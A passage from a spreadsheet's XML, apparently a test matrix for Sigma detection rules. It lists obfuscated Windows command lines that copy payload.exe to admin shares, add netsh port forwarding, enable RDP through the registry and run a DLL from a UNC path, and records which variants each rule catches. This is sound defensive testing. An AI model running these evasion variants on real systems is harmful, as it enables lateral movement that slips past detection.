          <t>cmd.exe -"c" \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F159" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G159" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H159" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I159" s="36" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f); Potential Download/Upload Activity Using Type Command (aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f)</t>
        </is>
      </c>
      <c r="J159" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K159" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="160" ht="15.75" customHeight="1" s="42">
      <c r="A160" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B160" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C160" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D160" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E160" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F160" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G160" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H160" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I160" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J160" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K160" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="161" ht="15.75" customHeight="1" s="42">
      <c r="A161" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B161" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C161" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D161" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E161" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F161" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G161" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H161" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I161" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J161" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K161" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="162" ht="15.75" customHeight="1" s="42">
      <c r="A162" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B162" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C162" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D162" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E162" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaNd "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F162" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G162" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H162" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I162" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J162" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K162" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="163" ht="15.75" customHeight="1" s="42">
      <c r="A163" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B163" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C163" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D163" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E163" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comManD "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F163" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G163" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H163" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I163" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J163" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K163" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1" s="42">
      <c r="A164" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B164" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C164" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D164" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E164" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F164" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G164" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H164" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I164" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J164" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K164" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="165" ht="15.75" customHeight="1" s="42">
      <c r="A165" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B165" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C165" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D165" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E165" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F165" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G165" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H165" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I165" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J165" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K165" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1" s="42">
      <c r="A166" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B166" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C166" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D166" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E166" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^o^p^y C:\temp\file.txt \\192.168.1.10\C$\Windows\Temp\file.txt</t>
        </is>
      </c>
      <c r="F166" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G166" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H166" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I166" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J166" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K166" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="167" ht="15.75" customHeight="1" s="42">
      <c r="A167" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B167" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C167" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D167" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E167" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F167" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I167" s="36" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J167" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K167" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="168" ht="15.75" customHeight="1" s="42">
      <c r="A168" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B168" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C168" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D168" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E168" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F168" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G168" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H168" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I168" s="36" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J168" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K168" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="169" ht="15.75" customHeight="1" s="42">
      <c r="A169" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B169" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C169" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D169" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E169" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F169" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G169" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H169" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I169" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J169" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K169" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1" s="42">
      <c r="A170" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B170" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C170" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D170" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E170" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaND "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F170" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G170" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H170" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I170" s="36" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J170" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K170" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="171" ht="15.75" customHeight="1" s="42">
      <c r="A171" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B171" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C171" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D171" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E171" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F171" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G171" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H171" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I171" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J171" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K171" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="172" ht="15.75" customHeight="1" s="42">
      <c r="A172" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B172" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C172" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D172" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E172" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -commAND "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F172" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G172" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H172" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I172" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J172" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K172" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="173" ht="15.75" customHeight="1" s="42">
      <c r="A173" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B173" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C173" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D173" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E173" s="43" t="inlineStr">
        <is>
          <t>powershell -NoPRofILE -comMand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G173" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H173" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I173" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J173" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K173" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="174" ht="15.75" customHeight="1" s="42">
      <c r="A174" s="43" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B174" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C174" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D174" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E174" s="43" t="inlineStr">
        <is>
          <t>powershell -nOPrOFiLE -c "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G174" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H174" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I174" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J174" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K174" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="175" ht="15.75" customHeight="1" s="42">
      <c r="A175" s="43" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B175" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C175" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D175" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E175" s="43" t="inlineStr">
        <is>
          <t>powershell -NoProfILe -cOmmand "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F175" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G175" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H175" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I175" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J175" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K175" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="176" ht="15.75" customHeight="1" s="42">
      <c r="A176" s="43" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B176" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C176" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D176" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E176" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -COmMANd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G176" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H176" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I176" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder (855bc8b5-2ae8-402e-a9ed-b889e6df1900)</t>
        </is>
      </c>
      <c r="J176" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K176" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="177" ht="15.75" customHeight="1" s="42">
      <c r="A177" s="36" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B177" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C177" s="36" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D177" s="36" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E177" s="43" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=1337 connect""port=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G177" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H177" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I177" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J177" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K177" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="178" ht="15.75" customHeight="1" s="42">
      <c r="A178" s="36" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B178" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C178" s="36" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D178" s="36" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E178" s="43" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=1337 connectport=1337  connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F178" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G178" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H178" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I178" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J178" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K178" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="179" ht="15.75" customHeight="1" s="42">
      <c r="A179" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B179" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C179" s="43" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D179" s="43" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E179" s="43" t="inlineStr">
        <is>
          <t>echo Y | reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I179" s="43" t="n"/>
      <c r="J179" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K179" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="180" ht="15.75" customHeight="1" s="42">
      <c r="A180" s="36" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B180" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C180" s="36" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D180" s="36" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E180" s="36" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F180" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G180" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H180" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I180" s="43" t="n"/>
      <c r="J180" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K180" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="181" ht="15.75" customHeight="1" s="42">
      <c r="A181" s="36" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B181" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C181" s="36" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D181" s="36" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E181" s="36" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0/f</t>
        </is>
      </c>
      <c r="F181" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G181" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H181" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I181" s="43" t="n"/>
      <c r="J181" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K181" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="182" ht="15.75" customHeight="1" s="42">
      <c r="A182" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B182" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C182" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D182" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E182" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.100/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F182" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G182" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H182" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I182" s="43" t="n"/>
      <c r="J182" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K182" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="183" ht="15.75" customHeight="1" s="42">
      <c r="A183" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B183" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C183" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D183" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
